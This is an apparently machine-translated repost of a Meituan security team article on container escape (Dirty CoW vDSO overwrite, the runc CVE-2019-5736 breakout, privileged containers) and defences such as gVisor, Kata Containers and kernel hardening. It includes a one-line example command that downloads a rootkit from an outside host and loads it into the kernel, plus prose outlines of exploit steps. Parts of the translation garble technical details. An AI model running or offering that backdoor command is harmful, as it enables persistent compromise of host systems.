Container Security practice of Cloud Native 09/22 Update SLTechnology News&Howtos

Container Security practice of Cloud Native

2025-09-22 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >

Shulou(Shulou.com)06/02 Report--

As more and more enterprises begin to go to the cloud and become containerized, the issue of cloud security has become the top priority of enterprise protection.

Today's article comes from Meituan's information security team. they start with the representative technology of cloud native and take container escape as the starting point. from the perspective of attackers (container escape) to defenders (mitigating container escape), this paper expounds some of Meituan's exploration and practice at the container security level.

Overview

Cloud Native is a set of technical system and methodology, which consists of two words, Cloud and Native. Cloud means that the application is located in the cloud, rather than the traditional data center; Native means that the application is designed for the cloud from the beginning, is designed for the cloud, runs at its best on the cloud, and makes full use of the flexibility and distributed advantages of the cloud platform.

Representative technologies of cloud natives include containers, service grids (Service Mesh), micro services (Microservice), immutable infrastructure and declarative API. For more information on cloud natives, please refer to CNCF/Foundation.

The author abstracts "cloud native security" into the technical sand table shown above. From the bottom up, the underlying layer is from hardware security (trusted environment) to host security. Container orchestration technology (Kubernetes, etc.) is regarded as an "operating system" on the cloud, which is responsible for automatic deployment, scale-up, management of applications, and so on. It is composed of micro-service, Service Mesh, container technology (Docker, etc.) and container image (repository). They complement each other and build cloud native security based on these technologies.

Let's make another abstraction of container security, which can be regarded as build-time security (Build), deployment-time security (Deployment), and run-time security (Runtime).

Within Meituan, image security is guaranteed by the container image analysis platform. It operates the supervision container image in the form of a rule engine. The default rules support checking Dockerfile, suspicious files, sensitive permissions, sensitive ports, basic software vulnerabilities, business software vulnerabilities and best practices of CIS and NIST in the image, and provide risk trend analysis. At the same time, it ensures security during partial construction.

Containers are deployed by container orchestration technology (such as Kubernetes) under the cloud native architecture, and deployment security also overlaps with the container orchestration security mentioned above.

HIDS is responsible for running security control (see "ensuring IDC Security: distributed HIDS Cluster Architecture Design"). The scope discussed in this article is also one of operational security, which mainly addresses the risk of modeling container escape (in this article, container refers to Docker unless otherwise specified).

For security implementation guidelines, we divide them into three phases:

Before the attack: cut the attack surface to reduce the exposed attack surface (the scenario keywords involved in this article: isolation)

When attacking: reduce the success rate of the attack (the scenario keywords covered in this article: reinforcement)

After the attack: reduce the valuable information and data that the attacker can obtain after the successful attack, and increase the difficulty of leaving the back door.

In recent years, the infrastructure of the data center has gradually shifted from traditional virtualization (such as KVM+QEMU architecture) to containerization (Kubernetes+Docker architecture), but "escape" has always been the most serious security problem that enterprises have to face under these two architectures, and it is also the most representative security issue in container risks. The author will take the container escape as the starting point, from the point of view of the attacker (container escape) to the defender's point of view (mitigation of container escape) to explain the practice of container security, so as to alleviate the risk of container.

Container risk

Containers provide a standard way to package application code, configuration, and dependencies into a single object. Containers are built on two key technologies: Linux Namespace and Linux Cgroups.

Namespace creates a near-isolated user space and provides system resources (file system, network stack, processes, and user ID) for applications. Cgroup enforces restrictions on hardware resources, such as CPU, memory, devices, and networks.

Containers differ from VM in that VM simulates hardware systems, and each VM can run OS in a separate environment. The hypervisor simulates CPU, memory, storage, network resources, and so on, which can be shared multiple times by multiple VM.

The container has a total of seven attack surfaces: Linux Kernel, Namespace/Cgroups/Aufs, Seccomp-bpf, Libs, Language VM, User Code, Container (Docker) engine.

Taking the container escape as the risk model, the author refines three attack surfaces:

Linux kernel vulnerabilities

The container itself

Insecure deployment (configuration).

1. Linux kernel vulnerabilities

The kernel of the container is shared with the host kernel, and the two technologies of Namespace and Cgroups are used to isolate the resources in the container from the host, so the vulnerability caused by the Linux kernel can cause the container to escape.

VS Container escapes from Kernel Rights

Methodology of General Linux Kernel Enhancement

Information collection: collect all the information that is helpful for writing exploit. For example: kernel version, need to determine the kernel version of the attack? What hardening configurations are enabled in this kernel version? Also need to know which kernel functions will be called when writing shellcode? At this point, you need to query the kernel symbol table to get the function address. You can also get some address information, structure information and so on that are helpful for writing and using from the kernel.

Trigger phase: trigger related vulnerabilities, control RIP, hijack kernel code paths, in short, acquire the ability to execute arbitrary code in the kernel.

Layout shellcode: when writing kernel exploit code, we need to find a piece of memory to hold our shellcode. This piece of memory must meet at least two conditions:

First: when a vulnerability is triggered, if we want to hijack the code path, we must ensure that the code path can reach the memory where the shellcode is stored.

Second: this piece of memory can be executed, in other words, the memory in which the shellcode is stored has executable permissions.

Execution phase

First: to obtain permissions higher than the current user, we usually directly obtain root permissions, after all, it is the highest authority in Linux, that is, to execute our shellcode.

Second: to ensure the stability of the kernel, we can not destroy the original kernel code path, kernel structure, kernel data and so on because we need to raise rights, and then cause the kernel to crash. In that case, it doesn't make much sense to get root permissions.

In short, collect information that is helpful for writing exploit, and then trigger vulnerabilities to execute privileged code to achieve the effect of privilege.

There is only a slight difference between container escape and kernel lifting, and you need to break through the limitations of namespace. Assign a highly privileged namespace to the task_struct of the exploit process. The detailed technical details of this part are not within the scope of this article. In the future, the author will take the time to write another technical article on container escape to introduce the details of the related technology.

Classic Dirty CoW

The author uses Dirty CoW vulnerability to illustrate the container escape caused by Linux vulnerability. Although the loophole is old, it is too classic. Writing about this, the author can't help but ask: over the years, what is the stock machine repair rate of Dirty Cow loopholes in major factories at home and abroad?

A contention conflict was found in the way the memory subsystem of the Linux kernel handles the write-on-copy (Copy-on-Write,CoW) mechanism of private read-only memory maps. An unprivileged local user may take advantage of this vulnerability to gain write access to read-only memory maps in other cases, thereby increasing their privileges on the system, which is known as the Dirty CoW vulnerability.

The realization idea of the escape of Dirty CoW vulnerability is not the same as that mentioned above, so we adopt Overwrite vDSO technology.

VDSO (Virtual Dynamic Shared Object) is a mechanism designed by the kernel to reduce the frequent switching between kernel and user space and improve the efficiency of system calls. It is mapped both in kernel space and in the virtual memory of each process, including those running with root privileges. You can speed up this step (locating vDSO) by calling system calls that do not require context switching (context switching). VDSO is mapped to R _ userspace X in user space (kernelspace) and R _ map W in kernel space (kernel). This allows us to modify it in kernel space and then execute it in user space. And because the container is shared with the host kernel, you can directly use this technology to escape the container.

The steps of utilization are as follows:

Get the vDSO address, which can be obtained by calling the getauxval () function directly in the new version of glibc.

Find the address of the clock_gettime () function through the vDSO address and check whether it is possible to hijack

Create a listening socket

The trigger vulnerability, Dirty CoW, is due to a vulnerability when the kernel memory management system implements CoW. Through conditional competition, at the right time, the read-only of the file can be mapped to write by using the characteristics of CoW. The child process keeps checking to see if the write was successful. The parent process creates two threads, and the ptrace_thread thread writes shellcode to vDSO. The madvise_thread thread frees the vDSO mapping space, which affects the CoW process of the ptrace_ thread, resulting in conditional contention, which can be written successfully when the condition is triggered.

Execute shellcode, wait for the root shell to be returned from the host, and recover the original vDSO data after success.

two。 The container itself

Let's take a brief look at the architecture diagram of Docker:

Docker itself consists of Docker (Docker Client) and Dockerd (Docker Daemon). But since Docker 1.11, Docker is no longer simply launched through Docker Dameon, but integrates many components, including containerd, runc, and so on.

Docker Client is a client program for Docker that sends user requests to Dockerd. Dockerd actually calls the API interface of containerd. Containerd is an intermediate communication component between Dockerd and runc, which is mainly responsible for container operation, image management and so on. Containerd provides gRPC interface for Dockerd up, which makes Dockerd shield the following structural changes to ensure the downward compatibility of the original interface; downwards, create and run containers through the combination of containerd-shim and runc. For more information, please refer to the links runc, containerd, architecture at the end of the article. With a clear understanding of these, we can combine our own security experience to find loopholes that can lead to escape from the way these components communicate with each other, dependencies, and so on.

Let's use the vulnerability caused by the runc component in Docker to illustrate the escape caused by the vulnerability of the container itself.

CVE-2019-5736:runc-container breakout vulnerability

Runc has a vulnerability when using file system descriptors that can cause privileged containers to be exploited, causing containers to escape and access the host file system; attackers can also use malicious mirrors or modify configurations within running containers to exploit this vulnerability.

Attack mode 1: (this path requires a privileged container) the running container is invaded and the system file is maliciously tampered with = > the host runs the docker exec command and creates a new process in the container. The host runc is replaced with a malicious program = > the host triggers the execution of the malicious program when the host executes the docker run/exec command

Attack method 2: the docker run command starts the maliciously modified image = > the host runc is replaced with the malicious program = = > the host runs the docker run/exec command to trigger the execution of the malicious program.

When runc executes a new program within the container, an attacker can trick it into executing a malicious program. Point back to runc binaries by replacing the target binaries in the container with custom binaries.

If the target binary is / bin/bash, you can replace #! / proc/self/exe with the executable script of the specified interpreter. Therefore, the goal of executing / bin/bash,/proc/self/exe within the container will be executed, pointing the target to the runc binary.

The attacker can then continue to write to the / proc/self/exe target and try to overwrite the runc binaries on the host. Here you need to open the / proc/self/exe file descriptor using O_PATH flag, and then pass / proc/self/fd/ with O_WRONLY flag

3. Insecure deployment (configuration)

In practice, we often encounter this situation: different businesses will provide a set of their own configuration according to their own business needs, but this set of configuration has not been effectively controlled and audited, making the internal environment complex and diverse. virtually added a lot of risk points. The most common ones include:

Privileged container or run container with root permissions

Unreasonable Capability configuration (Capability with excessive permissions).

Facing the privileged container, simply execute the command inside the container and you can easily leave a back door on the host: $wget https://kernfunny.org/backdoor/rootkit.ko & & insmod rootkit.ko

At present, within Meituan, we have effectively converged the problem of privileged containers.

This part of the industry has given best practices to ensure security in terms of host configuration, Dockerd configuration, container image, Dockerfile, container runtime, and so on. For more details, please see Benchmark/Docker. At the same time, Docker officials have implemented it as an automation tool (gVisor).

Safety practice

In order to solve the problem of container escape described in the above section, the following article will focus on isolation (security container) and reinforcement (security kernel).

Safety container

The technical essence of safe containers is isolation. GVisor and Kata Container are representative implementation methods. At present, academia is also exploring the security container based on Intel SGX.

To put it simply, gVisor abstracts a layer between user state and kernel state and encapsulates it into API, a bit like user-mode kernel, in order to achieve isolation. Kata Container uses lightweight virtual machine isolation, which is similar to traditional VM, but it seamlessly integrates the current Kubernetes plus Docker architecture. Let's move on to the similarities and differences between gVisor and Kata Container.

Case 1: gVisor

GVisor is a user-mode kernel, or sandbox technology, written in Golang, which mainly implements most of the system call. It runs between the application and the kernel, providing isolation for them. GVisor is used in App Engine, Cloud Functions, and Cloud ML of the Google cloud computing platform. The gVisor runtime consists of multiple sandboxed processes that collectively cover one or more containers. By intercepting all system calls from the application to the host kernel and processing them using Sentry in user space, gVisor acts as guest kernel and can be thought of as a collection of vmm and guest kernel, or an enhanced version of seccomp, without the need for virtualized hardware transformations.

Figure 5 gVisor architecture diagram

Case 2: Kata Container

Kata Container's Container Runtime is implemented in hypervisor and then in hardware virtualization, just like a virtual machine. So every Kata Container Pod like this is a lightweight virtual machine with a complete Linux kernel. So Kata Container provides the same strong isolation as VM, but it also has agility comparable to containers because of its optimization and performance design.

Kata Container has a kata-runtime on the host to start and configure the new container. For each container in Kata VM, there is a corresponding Kata Shim on the host. The Kata Shim receives API requests (such as Docker or kubectl) from the client and forwards the request to the agent within the Kata VM through VSock. The Kata container is further optimized to reduce VM startup time. Using NEMU, a lightweight version of QEMU, about 80 per cent of devices and packages have been removed. VM-Templating creates clones that run Kata VM instances and shares them with other newly created Kata VM, reducing startup time and Guest VM memory consumption. The Hotplug feature allows VM to boot with a minimum of resources (such as CPU, memory, virtio blocks) and add other resources when requested later.

GVisor VS Kata Container

Between the two, the author prefers to choose gVisor, because the design of gVisor is more "light" than Kata Container, but the performance problem of gVisor is always an insurmountable "natural cutting". Combining the advantages and disadvantages of the two, Kata Container is more suitable for the enterprise at present. Overall, secure container technology still needs to be explored to address the challenges faced by the internal infrastructure of different enterprises.

Security kernel

As we all know, different vendors maintain their own Android versions because of Android's open source features. Because the Android kernel state code comes from Linux kernel upstrem, when a vulnerability occurs in the upstrem kernel, security patches are pushed to Google, then distributed from Google to major vendors, and finally to end users. Due to the fragmentation of Android ecology, the patch cycle is very long, so that the security of end users is always in a "window period" in this process. When we refocus on Linux, it has a similar problem.

The problems facing the kernel

Kernel patch

When a security vulnerability is disclosed, it is usually reported by the vulnerability discoverer through Redhat, OpenSuse, Debian and other communities or submitted directly to the upstream related subsystem maintainer. Faced with many different kernel versions and kernel customization within the enterprise, backport-related patches and relevant hot patches are made for different versions of the upstream code. Customized kernels also need to redevelop the patches, and then upgrade the production environment kernel or Hotfix kernel. Not only the repair cycle is too long, but also in the repair process, personnel communication also has a certain cost, but also lengthens the vulnerability danger period. During the period of danger, we are basically defenseless against vulnerabilities.

Fragmentation of kernel version

Kernel version fragmentation is an inevitable problem in any company of a certain size. With the rapid development of technology and continuous iteration, the technology stack on the infrastructure needs to be supported by a newer version of the kernel function, resulting in the fragmentation of the kernel version over time. The existence of fragmentation problem makes it a great challenge in the push of security patches. The patch itself also needs to be adapted specifically, including different versions of the kernel, and tested and verified, and fragmentation makes the maintenance cost very high. Most importantly, due to the heavy maintenance workload, the timeline of testing patches must be lengthened. In other words, the period of danger exposed to the attacker becomes longer, and the possibility of being attacked is greatly increased.

Customization of kernel version

Similarly, customized kernel problems are caused by the different infrastructure and requirements of different companies. For a customized kernel, you can't simply combine patches from the upstream kernel, and you need to localize the patches to adapt to the customized kernel. This lengthens the crisis period again.

The solution

We use security features to defend and detect against a certain type of vulnerability or against a certain type of exploitation. For example, SLAB_FREELIST_HARDENED performs real-time detection of Double Free-type vulnerabilities and defends against overwrite freelist linked lists with a performance loss of only 0.07% (see upstrem kernel source code, commit id: 2482ddec).

When all the security features are completed, the vulnerability can be defended without paying attention to the details of the vulnerability before it is fed back and before the vulnerability patch is pushed to the production environment in time. Of course, the security patch should be hit or not. Here we mainly solve the problem that when the security patch finally falls into the production environment, the "window period" has no defense against vulnerabilities and exploitations. at the same time, it can also have a certain detection and defense capability against 0day.

Implementation strategy

The security features of the mainline version of Linux have been incorporated. If the company's kernel supports this feature, choose to enable the configuration, test the performance of the kernel before and after enabling it, analyze the principle of security features and industry data, give a Real World attack case (write your own exploit to prove it), and feedback the conclusion of the report to the kernel team. The kernel team then makes an evaluation, combined with the opinions of both the security team and the kernel team, and finally evaluates the landing. The security features that have been incorporated into the mainline version of Linux but not into Redhat can be ported from the mainline version of the Linux kernel, which ensures the quality of the code. at the same time, the community has also done a performance test and merged it into the company's kernel for re-testing.

It has not been incorporated into the mainline version of the Linux kernel and is transplanted from Grsecurity/PaX. Among the many security features of Grsecurity/PaX, evaluation and selection, the security features with few code changes and high benefits are preferred to be transplanted. For example, less kernel code changes can effectively solve certain types of vulnerabilities, for example, full repair of Dirty Cow may take 1-2 years, if a security feature is added, it can be defended even if it is not fixed.

After the kernel

Finally, I would like to share the ideal situation in the author's eyes. Of course, we have to "adjust measures to local conditions" according to the actual situation and make different choices and choices at different stages.

Treat the kernel team as a community, and we submit code to them, just as the Linux kernel community has RFC (Request for Comment), Patch Review, and so on, and then merge into the corporate kernel without controversy.

First select practical security features and a small amount of code, to transplant, to implement, and landing. Less code means fewer changes to the kernel code, the less likely to go wrong, the higher the stability, and the lower the performance loss.

To complete several security features in a year, you don't need more than one or two. For the reinforcement of the kernel, you should be cautious and prudent. For example, it takes about 6 to 7 months to test the performance and stability of the data centers of G companies abroad before they are released.

After a security feature needs to be reinforced, use 0day or Nday to verify the defense effect, and the business based on this kernel is stable and the performance loss is within acceptable range or controllable. Each security feature requires a technical review. In order to ensure the quality of the code, find the actual high throughput and high concurrency and low latency server small-scale grayscale test, after no dispute, and then push it to the kernel team.

Finally, we can also submit the code of security features directly to the Linux kernel community, and if there are deficiencies in the code, we can also work with the community to solve the problem, and merge the code into the main line code of the Linux kernel, thus promoting the landing on the side.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.